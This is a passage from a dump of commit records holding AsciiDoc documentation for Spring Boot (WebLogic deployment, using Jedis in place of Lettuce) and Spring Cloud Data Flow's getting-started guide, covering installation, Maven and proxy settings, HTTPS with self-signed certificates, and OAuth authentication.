suggest\nhttps:\/\/stackoverflow.com\/questions\/tagged\/spring-boot[asking questions on Stack Overflow\nwith a tag of `spring-boot`].\n\n\n\n[[howto-weblogic]]\n=== Deploying a WAR to WebLogic\nTo deploy a Spring Boot application to WebLogic, you must ensure that your servlet\ninitializer *directly* implements `WebApplicationInitializer` (even if you extend from a\nbase class that already implements it).\n\nA typical initializer for WebLogic should resemble the following example:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\timport org.springframework.boot.autoconfigure.SpringBootApplication;\n\timport org.springframework.boot.web.servlet.support.SpringBootServletInitializer;\n\timport org.springframework.web.WebApplicationInitializer;\n\n\t@SpringBootApplication\n\tpublic class MyApplication extends SpringBootServletInitializer implements WebApplicationInitializer {\n\n\t}\n----\n\nIf you use Logback, you also need to tell WebLogic to prefer the packaged version\nrather than the version that was pre-installed with the server. You can do so by adding a\n`WEB-INF\/weblogic.xml` file with the following contents:\n\n[source,xml,indent=0]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<wls:weblogic-web-app\n\t\txmlns:wls=\"http:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txsi:schemaLocation=\"http:\/\/java.sun.com\/xml\/ns\/javaee\n\t\t\thttps:\/\/java.sun.com\/xml\/ns\/javaee\/ejb-jar_3_0.xsd\n\t\t\thttp:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\n\t\t\thttps:\/\/xmlns.oracle.com\/weblogic\/weblogic-web-app\/1.4\/weblogic-web-app.xsd\">\n\t\t<wls:container-descriptor>\n\t\t\t<wls:prefer-application-packages>\n\t\t\t\t<wls:package-name>org.slf4j<\/wls:package-name>\n\t\t\t<\/wls:prefer-application-packages>\n\t\t<\/wls:container-descriptor>\n\t<\/wls:weblogic-web-app>\n----\n\n\n\n[[howto-use-jedis-instead-of-lettuce]]\n=== Use Jedis Instead of Lettuce\nBy default, the Spring Boot starter (`spring-boot-starter-data-redis`) uses\nhttps:\/\/github.com\/lettuce-io\/lettuce-core\/[Lettuce]. You need to exclude that\ndependency and include the https:\/\/github.com\/xetorthio\/jedis\/[Jedis] one instead. Spring\nBoot manages these dependencies to help make this process as easy as possible.\n\nThe following example shows how to do so in Maven:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<dependency>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-starter-data-redis<\/artifactId>\n\t\t<exclusions>\n\t\t\t<exclusion>\n\t\t\t\t<groupId>io.lettuce<\/groupId>\n\t\t\t\t<artifactId>lettuce-core<\/artifactId>\n\t\t\t<\/exclusion>\n\t\t<\/exclusions>\n\t<\/dependency>\n\t<dependency>\n\t\t<groupId>redis.clients<\/groupId>\n\t\t<artifactId>jedis<\/artifactId>\n\t<\/dependency>\n----\n\nThe following example shows how to do so in Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\tconfigurations {\n\t\tcompile.exclude module: \"lettuce\"\n\t}\n\n\tdependencies {\n\t\tcompile(\"redis.clients:jedis\")\n\t\t\/\/ ...\n\t}\n----\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"55bd16482edbe3b7a179097c812af4bb348bd6d4","subject":"Add doc for maven repository config","message":"Add doc for maven repository config\n\nThis resolves #735\n","repos":"jvalkeal\/spring-cloud-dataflow,markfisher\/spring-cloud-data,ilayaperumalg\/spring-cloud-dataflow,cppwfs\/spring-cloud-dataflow,markpollack\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,ericbottard\/spring-cloud-dataflow,trisberg\/spring-cloud-dataflow,ghillert\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,jvalkeal\/spring-cloud-data,sabbyanandan\/spring-cloud-dataflow,markfisher\/spring-cloud-dataflow,trisberg\/spring-cloud-dataflow,sabbyanandan\/spring-cloud-dataflow,donovanmuller\/spring-cloud-dataflow,ghillert\/spring-cloud-dataflow,donovanmuller\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,cppwfs\/spring-cloud-dataflow,cppwfs\/spring-cloud-dataflow,markfisher\/spring-cloud-data,spring-cloud\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,markfisher\/spring-cloud-dataflow,trisberg\/spring-cloud-dataflow,markpollack\/spring-cloud-dataflow,markpollack\/spring-cloud-dataflow,mminella\/spring-cloud-data,donovanmuller\/spring-cloud-dataflow,ericbottard\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,sabbyanandan\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,ericbottard\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,mbogoevici\/spring-cloud-data,jvalkeal\/spring-cloud-data,trisberg\/spring-cloud-dataflow,mbogoevici\/spring-cloud-data,markfisher\/spring-cloud-data,spring-cloud\/spring-cloud-dataflow,mminella\/spring-cloud-data,ilayaperumalg\/spring-cloud-dataflow,markfisher\/spring-cloud-dataflow,jvalkeal\/spring-cloud-data,spring-cloud\/spring-cloud-data,spring-cloud\/spring-cloud-dataflow,markfisher\/spring-cloud-dataflow,ilayaperumalg\/spring-cloud-dataflow,mbogoevici\/spring-cloud-data","old_file":"spring-cloud-dataflow-docs\/src\/main\/asciidoc\/getting-started.adoc","new_file":"spring-cloud-dataflow-docs\/src\/main\/asciidoc\/getting-started.adoc","new_contents":"[[getting-started]]\n= Getting started\n\n[partintro]\n--\nIf you're just getting started with Spring Cloud Data Flow, this is the section\nfor you! Here we answer the basic \"`what?`\", \"`how?`\" and \"`why?`\" questions. You'll\nfind a gentle introduction to Spring Cloud Data Flow along with installation instructions.\nWe'll then build our first Spring Cloud Data Flow application, discussing some core principles as\nwe go.\n--\n\n[[getting-started-system-requirements]]\n== System Requirements\n\nYou need Java installed (Java 7 or better, we recommend Java 8), and to build, you need to have Maven installed as well.\n\nYou need to have an RDBMS for storing stream, task and app states in the database. The `local` dataflow server by default uses embedded H2 database for this.\n\nYou also need to have link:http:\/\/redis.io[Redis] running if you are running any streams that involve analytics applications. Redis may also be required run the unit\/integration tests.\n\nFor the deployed streams and tasks to communicate, either link:http:\/\/rabbitmq.com[RabbitMQ] or link:http:\/\/kafka.apache.org[Kafka] needs to be installed. The local server registers sources, sink, processors and tasks the are published from the link:https:\/\/github.com\/spring-cloud\/spring-cloud-stream-app-starters[Spring Cloud Stream App Starters] and link:https:\/\/github.com\/spring-cloud\/spring-cloud-task-app-starters[Spring Cloud Task App Starters] repository. By default the server registers these applications that use Kafka, but setting the property `binding` to `rabbit` will register a list of applications that use RabbitMQ as the message broker.\n\n[[enable-disable-specific-features]]\n== Controlling features with Dataflow server\n\nDataflow server offers specific set of features that can be enabled\/disabled when launching. These features include all the lifecycle operations, REST endpoints (server, client implementations including Shell and the UI) for:\n\n. Streams\n. Tasks\n. Analytics\n\nOne can enable, disable these features by setting the following boolean properties when launching the dataflow server:\n\n* `spring.cloud.dataflow.features.streams-enabled`\n* `spring.cloud.dataflow.features.tasks-enabled`\n* `spring.cloud.dataflow.features.analytics-enabled`\n\nBy default, all these features are enabled for `local` dataflow server.\n\nThe REST endpoint `\/features` provides information on the features enabled\/disabled.\n\n[[getting-started-deploying-spring-cloud-dataflow]]\n== Deploying Spring Cloud Data Flow\n\n=== Deploying 'local'\n. Download the Spring Cloud Data Flow Server and Shell apps:\n+\n[source,bash,subs=attributes]\n----\nwget http:\/\/repo.spring.io\/milestone\/org\/springframework\/cloud\/spring-cloud-dataflow-server-local\/{project-version}\/spring-cloud-dataflow-server-local-{project-version}.jar\n\nwget http:\/\/repo.spring.io\/milestone\/org\/springframework\/cloud\/spring-cloud-dataflow-shell\/{project-version}\/spring-cloud-dataflow-shell-{project-version}.jar\n----\n+\n. Launch the Data Flow Server\n+\n.. Since the Data Flow Server is a Spring Boot application, you can run it just by using `java -jar`.\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-server-local-{project-version}.jar\n----\n+\n.. Running with Custom Maven Settings and\/or Behind a Proxy\nIf you want to override specific maven configuration properties (remote repositories, etc.) and\/or run the Data Flow Server behind a proxy,\nyou need to specify those properties as command line arguments when starting the Data Flow Server. For example:\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-server-local-{project-version}.jar --maven.localRepository=mylocal\n--maven.localRepository=mylocal --maven.remote-repositories.repo1.url=https:\/\/repo1\n--maven.remote-repositories.repo1.auth.username=user1\n--maven.remote-repositories.repo1.auth.password=pass1\n--maven.remote-repositories.repo2.url=https:\/\/repo2 --maven.proxy.host=proxy1\n--maven.proxy.port=9010 --maven.proxy.auth.username=proxyuser1\n--maven.proxy.auth.password=proxypass1\n----\n+\nBy default, the protocol is set to `http`. You can omit the auth properties if the proxy doesn't need a username and password.\n+\nBy default, the maven `localRepository` is set to `${user.home}\/.m2\/repository\/`,\nand `https:\/\/repo.spring.io\/libs-snapshot` will be the only remote repository. Like in the above example, the remote\nrepositories can be specified along with their authentication (if needed). If the remote repositories are behind a proxy,\nthen the proxy properties can be specified as above.\n+\nIf you want to pass these properties as environment properties, then you need to use `SPRING_APPLICATION_JSON` to set\nthese properties and pass `SPRING_APPLICATION_JSON` as environment variable as below:\n+\n[source,bash]\n----\n$ SPRING_APPLICATION_JSON='{ \"maven\": { \"local-repository\": null,\n\"remote-repositories\": { \"repo1\": { \"url\": \"https:\/\/repo1\", \"auth\": { \"username\": \"repo1user\", \"password\": \"repo1pass\" } }, \"repo2\": { \"url\": \"https:\/\/repo2\" } },\n\"proxy\": { \"host\": \"proxyhost\", \"port\": 9018, \"auth\": { \"username\": \"proxyuser\", \"password\": \"proxypass\" } } } }' java -jar spring-cloud-dataflow-server-local-{project-version}.jar\n----\n+\n. Launch the shell:\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-shell-{project-version}.jar\n----\n+\nIf the Data Flow Server and shell are not running on the same host, point the shell to the Data Flow server:\n+\n[source,bash]\n----\nserver-unknown:>dataflow config server http:\/\/dataflow-server.cfapps.io\nSuccessfully targeted http:\/\/dataflow-server.cfapps.io\ndataflow:>\n----\n+\nBy default, the application registry will be empty. If you would like to register all out-of-the-box stream applications built with the Kafka binder in bulk, you can with the following command. For more details, review how to <<streams.adoc#spring-cloud-dataflow-register-apps, register applications>>.\n+\n[source,bash,subs=attributes]\n----\n$ dataflow:>app import --uri http:\/\/bit.ly\/stream-applications-kafka-maven\n----\n+\n. You can now use the shell commands to list available applications (source\/processors\/sink) and create streams. For example:\n+\n[source,bash]\n----\ndataflow:> stream create --name httptest --definition \"http --server.port=9000 | log\" --deploy\n----\n+\nNOTE: You will need to wait a little while until the apps are actually deployed successfully\nbefore posting data. Look in the log file of the Data Flow server for the location of the log\nfiles for the `http` and `log` applications. Tail the log file for each application to verify\nthe application has started.\n+\nNow post some data\n[source,bash]\n----\ndataflow:> http post --target http:\/\/localhost:9000 --data \"hello world\"\n----\nLook to see if `hello world` ended up in log files for the `log` application.\n\n[TIP]\n====\nIn case you encounter unexpected errors when executing shell commands, you can\nretrieve more detailed error information by setting the exception logging level\nto `WARNING` in `logback.xml`:\n\n[source,xml]\n----\n<logger name=\"org.springframework.shell.core.JLineShellComponent.exceptions\" level=\"WARNING\"\/>\n----\n\n====\n\n[[getting-started-security]]\n== Security\n\nBy default, the Data Flow server is unsecured and runs on an unencrypted HTTP connection.\nYou can secure your REST endpoints, as well as the Data Flow Dashboard by enabling HTTPS\nand requiring clients to authenticate.\n\n[[getting-started-security-enabling-https]]\n=== Enabling HTTPS\n\nBy default, the dashboard, management, and health endpoints use HTTP as a transport.\nYou can switch to HTTPS easily, by adding a certificate to your configuration in\n`application.yml`.\n\n[source,yaml]\n----\nserver:\n port: 8443 # <1>\n ssl:\n key-alias: yourKeyAlias # <2>\n key-store: path\/to\/keystore # <3>\n key-store-password: yourKeyStorePassword # <4>\n key-password: yourKeyPassword # <5>\n trust-store: path\/to\/trust-store # <6>\n trust-store-password: yourTrustStorePassword # <7>\n----\n\n<1> As the default port is `9393`, you may choose to change the port to a more common HTTPs-typical port.\n<2> The alias (or name) under which the key is stored in the keystore.\n<3> The path to the keystore file. Classpath resources may also be specified, by using the classpath prefix: `classpath:path\/to\/keystore`\n<4> The password of the keystore.\n<5> The password of the key.\n<6> The path to the truststore file. Classpath resources may also be specified, by using the classpath prefix: `classpath:path\/to\/trust-store`\n<7> The password of the trust store.\n\nNOTE: If HTTPS is enabled, it will completely replace HTTP as the protocol over\nwhich the REST endpoints and the Data Flow Dashboard interact. Plain HTTP requests\nwill fail - therefore, make sure that you configure your Shell accordingly.\n\n==== Using Self-Signed Certificates\n\nFor testing purposes or during development it might be convenient to create self-signed certificates.\nTo get started, execute the following command to create a certificate:\n\n[source,bash]\n----\n$ keytool -genkey -alias dataflow -keyalg RSA -keystore dataflow.keystore \\\n -validity 3650 -storetype JKS \\\n -dname \"CN=localhost, OU=Spring, O=Pivotal, L=Kailua-Kona, ST=HI, C=US\" # <1>\n -keypass dataflow -storepass dataflow\n----\n\n<1> _CN_ is the only important parameter here. It should match the domain you are trying to access, e.g. `localhost`.\n\nThen add the following to your `application.yml` file:\n\n[source,yaml]\n----\nserver:\n port: 8443\n ssl:\n enabled: true\n key-alias: dataflow\n key-store: \"\/your\/path\/to\/dataflow.keystore\"\n key-store-type: jks\n key-store-password: dataflow\n key-password: dataflow\n----\n\nThis is all that's needed for the Data Flow Server. Once you start the server,\nyou should be able to access it via https:\/\/localhost:8443\/[https:\/\/localhost:8443\/]. As this is a self-signed\ncertificate, you will hit a warning in your browser, that you need to ignore.\n\nThis issue also is relevant for the Data Flow Shell. Therefore additional steps are\nnecessary to make the Shell work with self-signed certificates. First, we need to\nexport the previously created certificate from the keystore:\n\n[source,bash]\n----\n$ keytool -export -alias dataflow -keystore dataflow.keystore -file dataflow_cert -storepass dataflow\n----\n\nNext, we need to create a truststore which the Shell will use:\n\n[source,bash]\n----\n$ keytool -importcert -keystore dataflow.truststore -alias dataflow -storepass dataflow -file dataflow_cert -noprompt\n----\n\nNow, you are ready to launch the Data Flow Shell using the following JVM arguments:\n\n[source,bash,subs=attributes]\n----\n$ java -Djavax.net.ssl.trustStorePassword=dataflow \\\n -Djavax.net.ssl.trustStore=\/path\/to\/dataflow.truststore \\\n -Djavax.net.ssl.trustStoreType=jks \\\n -jar spring-cloud-dataflow-shell-{project-version}.jar\n----\n\n[TIP]\n====\nIn case you run into trouble establishing a connection via SSL, you can enable additional\nlogging by using and setting the `javax.net.debug` JVM argument to `ssl`.\n====\n\nDon't forget to target the Data Flow Server with:\n\n[source,bash]\n----\ndataflow:> dataflow config server https:\/\/localhost:8443\/\n----\n\n[[getting-started-security-enabling-authentication]]\n=== Enabling Authentication\n\nBy default, the REST endpoints (administration, management and health), as well\nas the Dashboard UI do not require authenticated access. However, authentication can\nbe provided via http:\/\/oauth.net\/2\/[OAuth 2.0], thus allowing you to also integrate Spring Cloud\nData Flow into Single Sign On (SSO) environments. The following 2 OAuth2 Grant Types will be used:\n\n* _Authorization Code_ - Used for the GUI (Browser) integration. You will be redirected to your OAuth Service for authentication\n* _Password_ - Used by the shell (And the REST integration), so you can login using username and password\n\nThe REST endpoints are secured via Basic Authentication but will use the Password\nGrand Type under the covers to authenticate with your OAuth2 service.\n\nNOTE: When authentication is set up, it is strongly recommended to enable HTTPS\nas well, especially in production environments.\n\nYou can turn on authentication by adding the following to `application.yml` or via\nenvironment variables:\n\n[source,yaml]\n----\nsecurity:\n basic:\n enabled: true # <1>\n realm: Spring Cloud Data Flow # <2>\n oauth2: # <3>\n client:\n client-id: myclient\n client-secret: mysecret\n access-token-uri: http:\/\/127.0.0.1:9999\/oauth\/token\n user-authorization-uri: http:\/\/127.0.0.1:9999\/oauth\/authorize\n resource:\n user-info-uri: http:\/\/127.0.0.1:9999\/me\n----\n\n<1> Must be set to `true` for security to be enabled.\n<2> The realm for Basic authentication\n<3> OAuth Configuration Section\n\nNOTE: As of version 1.0 Spring Cloud Data Flow does not provide finer-grained authorization. Thus, once you are logged in, you have full access to all functionality.\n\nYou can verify that basic authentication is working properly using _curl_:\n\n[source,bash]\n----\n$ curl -u myusername:mypassword http:\/\/localhost:9393\/\n----\n\nAs a result you should see a list of available REST endpoints.\n\n[[getting-started-security-enabling-authentication-cloud-foundry]]\n==== Authentication and Cloud Foundry\n\nWhen deploying Spring Cloud Data Flow to Cloud Foundry, we take advantage of the\nhttps:\/\/github.com\/pivotal-cf\/spring-cloud-sso-connector[_Spring Cloud Single Sign-On Connector_],\nwhich provides Cloud Foundry specific auto-configuration support for OAuth 2.0\nwhen used in conjunction with the _Pivotal Single Sign-On Service_.\n\nSimply set `security.basic.enabled` to `true` and in Cloud Foundry bind the SSO\nservice to your Data Flow Server app and SSO will be enabled.\n\n","old_contents":"[[getting-started]]\n= Getting started\n\n[partintro]\n--\nIf you're just getting started with Spring Cloud Data Flow, this is the section\nfor you! Here we answer the basic \"`what?`\", \"`how?`\" and \"`why?`\" questions. You'll\nfind a gentle introduction to Spring Cloud Data Flow along with installation instructions.\nWe'll then build our first Spring Cloud Data Flow application, discussing some core principles as\nwe go.\n--\n\n[[getting-started-system-requirements]]\n== System Requirements\n\nYou need Java installed (Java 7 or better, we recommend Java 8), and to build, you need to have Maven installed as well.\n\nYou need to have an RDBMS for storing stream, task and app states in the database. The `local` dataflow server by default uses embedded H2 database for this.\n\nYou also need to have link:http:\/\/redis.io[Redis] running if you are running any streams that involve analytics applications. Redis may also be required run the unit\/integration tests.\n\nFor the deployed streams and tasks to communicate, either link:http:\/\/rabbitmq.com[RabbitMQ] or link:http:\/\/kafka.apache.org[Kafka] needs to be installed. The local server registers sources, sink, processors and tasks the are published from the link:https:\/\/github.com\/spring-cloud\/spring-cloud-stream-app-starters[Spring Cloud Stream App Starters] and link:https:\/\/github.com\/spring-cloud\/spring-cloud-task-app-starters[Spring Cloud Task App Starters] repository. By default the server registers these applications that use Kafka, but setting the property `binding` to `rabbit` will register a list of applications that use RabbitMQ as the message broker.\n\n[[enable-disable-specific-features]]\n== Controlling features with Dataflow server\n\nDataflow server offers specific set of features that can be enabled\/disabled when launching. These features include all the lifecycle operations, REST endpoints (server, client implementations including Shell and the UI) for:\n\n. Streams\n. Tasks\n. Analytics\n\nOne can enable, disable these features by setting the following boolean properties when launching the dataflow server:\n\n* `spring.cloud.dataflow.features.streams-enabled`\n* `spring.cloud.dataflow.features.tasks-enabled`\n* `spring.cloud.dataflow.features.analytics-enabled`\n\nBy default, all these features are enabled for `local` dataflow server.\n\nThe REST endpoint `\/features` provides information on the features enabled\/disabled.\n\n[[getting-started-deploying-spring-cloud-dataflow]]\n== Deploying Spring Cloud Data Flow\n\n=== Deploying 'local'\n. Download the Spring Cloud Data Flow Server and Shell apps:\n+\n[source,bash,subs=attributes]\n----\nwget http:\/\/repo.spring.io\/milestone\/org\/springframework\/cloud\/spring-cloud-dataflow-server-local\/{project-version}\/spring-cloud-dataflow-server-local-{project-version}.jar\n\nwget http:\/\/repo.spring.io\/milestone\/org\/springframework\/cloud\/spring-cloud-dataflow-shell\/{project-version}\/spring-cloud-dataflow-shell-{project-version}.jar\n----\n+\n. Launch the Data Flow Server\n+\n.. Since the Data Flow Server is a Spring Boot application, you can run it just by using `java -jar`.\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-server-local-{project-version}.jar\n----\n+\n.. Running with Custom Maven Settings and\/or Behind a Proxy\nIf you want to override specific maven configuration properties (remote repositories, etc.) and\/or run the Data Flow Server behind a proxy,\nyou need to specify those properties as command line arguments when starting the Data Flow Server. For example:\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-server-local-{project-version}.jar --maven.localRepository=mylocal --maven.remoteRepositories=repo1,repo2 --maven.offline=true\n--maven.proxy.protocol=https --maven.proxy.host=host1 --maven.proxy.port=8090 --maven.proxy.non_proxy_hosts='host2|host3' --maven.proxy.auth.username=user1 --maven.proxy.auth.password=passwd\n----\n+\nBy default, the protocol is set to `http`. You can omit the auth properties if the proxy doesn't need a username and password.\n+\nBy default, the maven `localRepository` is set to `${user.home}\/.m2\/repository\/`,\nand `https:\/\/repo.spring.io\/libs-snapshot` will be the only remote repository.\n+\nYou can also use environment variables to specify the maven\/proxy properties:\n+\n[source,bash]\n----\nexport MAVEN_LOCAL_REPOSITORY=mylocalMavenRepo\nexport MAVEN_REMOTE_REPOSITORIES=repo1,repo2\nexport MAVEN_OFFLINE=true\nexport MAVEN_PROXY_PROTOCOL=https\nexport MAVEN_PROXY_HOST=host1\nexport MAVEN_PROXY_PORT=8090\nexport MAVEN_PROXY_NON_PROXY_HOSTS='host2|host3'\nexport MAVEN_PROXY_AUTH_USERNAME=user1\nexport MAVEN_PROXY_AUTH_PASSWORD=passwd\n----\n+\n. Launch the shell:\n+\n[source,bash,subs=attributes]\n----\n$ java -jar spring-cloud-dataflow-shell-{project-version}.jar\n----\n+\nIf the Data Flow Server and shell are not running on the same host, point the shell to the Data Flow server:\n+\n[source,bash]\n----\nserver-unknown:>dataflow config server http:\/\/dataflow-server.cfapps.io\nSuccessfully targeted http:\/\/dataflow-server.cfapps.io\ndataflow:>\n----\n+\nBy default, the application registry will be empty. If you would like to register all out-of-the-box stream applications built with the Kafka binder in bulk, you can with the following command. For more details, review how to <<streams.adoc#spring-cloud-dataflow-register-apps, register applications>>.\n+\n[source,bash,subs=attributes]\n----\n$ dataflow:>app import --uri http:\/\/bit.ly\/stream-applications-kafka-maven\n----\n+\n. You can now use the shell commands to list available applications (source\/processors\/sink) and create streams. For example:\n+\n[source,bash]\n----\ndataflow:> stream create --name httptest --definition \"http --server.port=9000 | log\" --deploy\n----\n+\nNOTE: You will need to wait a little while until the apps are actually deployed successfully\nbefore posting data. Look in the log file of the Data Flow server for the location of the log\nfiles for the `http` and `log` applications. Tail the log file for each application to verify\nthe application has started.\n+\nNow post some data\n[source,bash]\n----\ndataflow:> http post --target http:\/\/localhost:9000 --data \"hello world\"\n----\nLook to see if `hello world` ended up in log files for the `log` application.\n\n[TIP]\n====\nIn case you encounter unexpected errors when executing shell commands, you can\nretrieve more detailed error information by setting the exception logging level\nto `WARNING` in `logback.xml`:\n\n[source,xml]\n----\n<logger name=\"org.springframework.shell.core.JLineShellComponent.exceptions\" level=\"WARNING\"\/>\n----\n\n====\n\n[[getting-started-security]]\n== Security\n\nBy default, the Data Flow server is unsecured and runs on an unencrypted HTTP connection.\nYou can secure your REST endpoints, as well as the Data Flow Dashboard by enabling HTTPS\nand requiring clients to authenticate.\n\n[[getting-started-security-enabling-https]]\n=== Enabling HTTPS\n\nBy default, the dashboard, management, and health endpoints use HTTP as a transport.\nYou can switch to HTTPS easily, by adding a certificate to your configuration in\n`application.yml`.\n\n[source,yaml]\n----\nserver:\n port: 8443 # <1>\n ssl:\n key-alias: yourKeyAlias # <2>\n key-store: path\/to\/keystore # <3>\n key-store-password: yourKeyStorePassword # <4>\n key-password: yourKeyPassword # <5>\n trust-store: path\/to\/trust-store # <6>\n trust-store-password: yourTrustStorePassword # <7>\n----\n\n<1> As the default port is `9393`, you may choose to change the port to a more common HTTPs-typical port.\n<2> The alias (or name) under which the key is stored in the keystore.\n<3> The path to the keystore file. Classpath resources may also be specified, by using the classpath prefix: `classpath:path\/to\/keystore`\n<4> The password of the keystore.\n<5> The password of the key.\n<6> The path to the truststore file. Classpath resources may also be specified, by using the classpath prefix: `classpath:path\/to\/trust-store`\n<7> The password of the trust store.\n\nNOTE: If HTTPS is enabled, it will completely replace HTTP as the protocol over\nwhich the REST endpoints and the Data Flow Dashboard interact. Plain HTTP requests\nwill fail - therefore, make sure that you configure your Shell accordingly.\n\n==== Using Self-Signed Certificates\n\nFor testing purposes or during development it might be convenient to create self-signed certificates.\nTo get started, execute the following command to create a certificate:\n\n[source,bash]\n----\n$ keytool -genkey -alias dataflow -keyalg RSA -keystore dataflow.keystore \\\n -validity 3650 -storetype JKS \\\n -dname \"CN=localhost, OU=Spring, O=Pivotal, L=Kailua-Kona, ST=HI, C=US\" # <1>\n -keypass dataflow -storepass dataflow\n----\n\n<1> _CN_ is the only important parameter here. It should match the domain you are trying to access, e.g. `localhost`.\n\nThen add the following to your `application.yml` file:\n\n[source,yaml]\n----\nserver:\n port: 8443\n ssl:\n enabled: true\n key-alias: dataflow\n key-store: \"\/your\/path\/to\/dataflow.keystore\"\n key-store-type: jks\n key-store-password: dataflow\n key-password: dataflow\n----\n\nThis is all that's needed for the Data Flow Server. Once you start the server,\nyou should be able to access it via https:\/\/localhost:8443\/[https:\/\/localhost:8443\/]. As this is a self-signed\ncertificate, you will hit a warning in your browser, that you need to ignore.\n\nThis issue also is relevant for the Data Flow Shell. Therefore additional steps are\nnecessary to make the Shell work with self-signed certificates. First, we need to\nexport the previously created certificate from the keystore:\n\n[source,bash]\n----\n$ keytool -export -alias dataflow -keystore dataflow.keystore -file dataflow_cert -storepass dataflow\n----\n\nNext, we need to create a truststore which the Shell will use:\n\n[source,bash]\n----\n$ keytool -importcert -keystore dataflow.truststore -alias dataflow -storepass dataflow -file dataflow_cert -noprompt\n----\n\nNow, you are ready to launch the Data Flow Shell using the following JVM arguments:\n\n[source,bash,subs=attributes]\n----\n$ java -Djavax.net.ssl.trustStorePassword=dataflow \\\n -Djavax.net.ssl.trustStore=\/path\/to\/dataflow.truststore \\\n -Djavax.net.ssl.trustStoreType=jks \\\n -jar spring-cloud-dataflow-shell-{project-version}.jar\n----\n\n[TIP]\n====\nIn case you run into trouble establishing a connection via SSL, you can enable additional\nlogging by using and setting the `javax.net.debug` JVM argument to `ssl`.\n====\n\nDon't forget to target the Data Flow Server with:\n\n[source,bash]\n----\ndataflow:> dataflow config server https:\/\/localhost:8443\/\n----\n\n[[getting-started-security-enabling-authentication]]\n=== Enabling Authentication\n\nBy default, the REST endpoints (administration, management and health), as well\nas the Dashboard UI do not require authenticated access. However, authentication can\nbe provided via http:\/\/oauth.net\/2\/[OAuth 2.0], thus allowing you to also integrate Spring Cloud\nData Flow into Single Sign On (SSO) environments. The following 2 OAuth2 Grant Types will be used:\n\n* _Authorization Code_ - Used for the GUI (Browser) integration. You will be redirected to your OAuth Service for authentication\n* _Password_ - Used by the shell (And the REST integration), so you can login using username and password\n\nThe REST endpoints are secured via Basic Authentication but will use the Password\nGrand Type under the covers to authenticate with your OAuth2 service.\n\nNOTE: When authentication is set up, it is strongly recommended to enable HTTPS\nas well, especially in production environments.\n\nYou can turn on authentication by adding the following to `application.yml` or via\nenvironment variables:\n\n[source,yaml]\n----\nsecurity:\n basic:\n enabled: true # <1>\n realm: Spring Cloud Data Flow # <2>\n oauth2: # <3>\n client:\n client-id: myclient\n client-secret: mysecret\n access-token-uri: http:\/\/127.0.0.1:9999\/oauth\/token\n user-authorization-uri: http:\/\/127.0.0.1:9999\/oauth\/authorize\n resource:\n user-info-uri: http:\/\/127.0.0.1:9999\/me\n----\n\n<1> Must be set to `true` for security to be enabled.\n<2> The realm for Basic authentication\n<3> OAuth Configuration Section\n\nNOTE: As of version 1.0 Spring Cloud Data Flow does not provide finer-grained authorization. Thus, once you are logged in, you have full access to all functionality.\n\nYou can verify that basic authentication is working properly using _curl_:\n\n[source,bash]\n----\n$ curl -u myusername:mypassword http:\/\/localhost:9393\/\n----\n\nAs a result you should see a list of available REST endpoints.\n\n[[getting-started-security-enabling-authentication-cloud-foundry]]\n==== Authentication and Cloud Foundry\n\nWhen deploying Spring Cloud Data Flow to Cloud Foundry, we take advantage of the\nhttps:\/\/github.com\/pivotal-cf\/spring-cloud-sso-connector[_Spring Cloud Single Sign-On Connector_],\nwhich provides Cloud Foundry specific auto-configuration support for OAuth 2.0\nwhen used in conjunction with the _Pivotal Single Sign-On Service_.\n\nSimply set `security.basic.enabled` to `true` and in Cloud Foundry bind the SSO\nservice to your Data Flow Server app and SSO will be enabled.\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4690799f9fa2df0a10f599d5eeef321395b2ca69","subject":"small doc fix with --dataflow.uri option","message":"small doc fix with --dataflow.uri option\n","repos":"markpollack\/spring-cloud-dataflow,markfisher\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,mminella\/spring-cloud-data,jvalkeal\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,spring-cloud\/spring-cloud-dataflow,trisberg\/spring-cloud-dataflow,jvalkeal\/spring-cloud-data,trisberg\/spring-cloud-dataflow,ghillert\/spring-cloud-dataflow,markfisher\/spring-cloud-dataflow,markpollack\/spring-cloud-dataflow,markfisher\/spring-cloud-dataflow,markpollack\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,spring-cloud\/spring-cloud-data,markfisher\/spring-cloud-data,mminella\/spring-cloud-data,spring-cloud\/spring-cloud-dataflow,markfisher\/spring-cloud-dataflow,ghillert\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,trisberg\/spring-cloud-dataflow,ilayaperumalg\/spring-cloud-dataflow,markfisher\/spring-cloud-data,jvalkeal\/spring-cloud-dataflow,trisberg\/spring-cloud-dataflow,cppwfs\/spring-cloud-dataflow,jvalkeal\/spring-cloud-dataflow,ilayaperumalg\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,spring-cloud\/spring-cloud-dataflow,cppwfs\/spring-cloud-dataflow,ilayaperumalg\/spring-cloud-dataflow,jvalkeal\/spring-cloud-data,markfisher\/spring-cloud-data,cppwfs\/spring-cloud-dataflow,jvalkeal\/s